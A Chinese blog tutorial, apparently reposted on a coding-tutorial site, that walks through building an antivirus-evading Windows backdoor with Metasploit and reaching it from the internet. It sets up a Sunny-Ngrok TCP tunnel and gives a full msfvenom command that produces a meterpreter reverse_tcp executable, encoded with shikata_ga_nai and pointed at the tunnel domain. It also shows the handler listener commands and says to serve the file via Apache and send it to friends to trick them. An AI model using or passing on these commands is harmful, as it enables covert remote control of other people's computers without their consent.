渗透测试(二)-Metasploit生成免杀后门(外网篇)

2021/6/2 20:22:30

本文主要是介绍渗透测试(二)-Metasploit生成免杀后门(外网篇),对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

 

1. Sunny-Ngrok 开通隧道

  1. 首先在官网注册会员
  2. 登陆
  3. 选择要开通的服务器
  4. 这里我们选择美国Ngrok免费服务器

 

 

选择tcp协议,填一个可以使用的端口号。

 

 

开通隧道后可以在 隧道管理 中看到自己的隧道信息:

 

记住这里的 隧道id赠送域名 以及 隧道端口,下面会用到。

 

 

2. 启动隧道

 

首先在kali linux中下载对应的客户端,选择Linux 64位版本。

 

 

启动隧道:

./sunny clientid 隧道id

 

启动多个隧道:

./sunny clientid 隧道id,隧道id

要想后台运行可以使用 setsid 命令:

setsid ./sunny clientid 隧道id &

 

隧道连接成功后会显示:

 

 

3. 生成后门

sudo su
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=free.idcfengye.com LPORT=10716 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/shell.exe

  

这里和内网渗透的区别就是:将LHOST换成隧道的域名地址,将LPORT换成隧道端口。

 

如果想要在软件中绑定后门,按照 渗透测试(一)-Metasploit生成免杀后门(内网篇) 文中第7步就行,注意修改LHOST和LPORT

 

4. 监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 10716
run

 

5. 下载后门

 

同样打开apache服务,下载后门,然后就可以发给你的小伙伴们去坑他们了!

如果觉得此篇文章对你有帮助,关注我的公众号【人人皆是程序员】就是对我最大的鼓励与认可!



这篇关于渗透测试(二)-Metasploit生成免杀后门(外网篇)的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!


扫一扫关注最新编程教程